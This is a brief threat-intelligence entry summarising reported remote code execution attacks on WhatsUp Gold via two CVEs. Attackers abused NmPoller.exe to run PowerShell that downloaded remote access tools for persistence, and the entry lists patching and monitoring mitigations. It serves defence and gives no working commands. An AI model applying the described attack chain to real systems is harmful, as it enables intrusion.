Protecting Against RCE Attacks Abusing WhatsUp Gold Vulnerabilities
Essential information
- Published
- 18/09/2024 08:29
- Modified
- 18/09/2024 09:00
- Tags
- 2024-09-18 CVE-2024-6670 CVE-2024-6671 atera agent radmin remote access tools splashtop remote whatsup gold
- Related entities
- 3 vulnerabilities (cve), 8 observables, 8 techniques (mitre), 4 malware
Description
Trend Micro researchers identified remote code execution attacks on WhatsUp Gold exploiting the Active Monitor PowerShell Script since August 30. These attacks possibly leveraged vulnerabilities CVE-2024-6670 and CVE-2024-6671, which were patched on August 16. The timeline suggests that some organizations were unable to apply patches quickly, leading to incidents immediately following the PoC's publication. Attackers abused NmPoller.exe to execute PowerShell scripts, downloading various remote access tools and attempting to gain persistence. Mitigation steps include keeping services under access control, immediate patch application, and monitoring suspicious process creation events in WhatsUp Gold environments.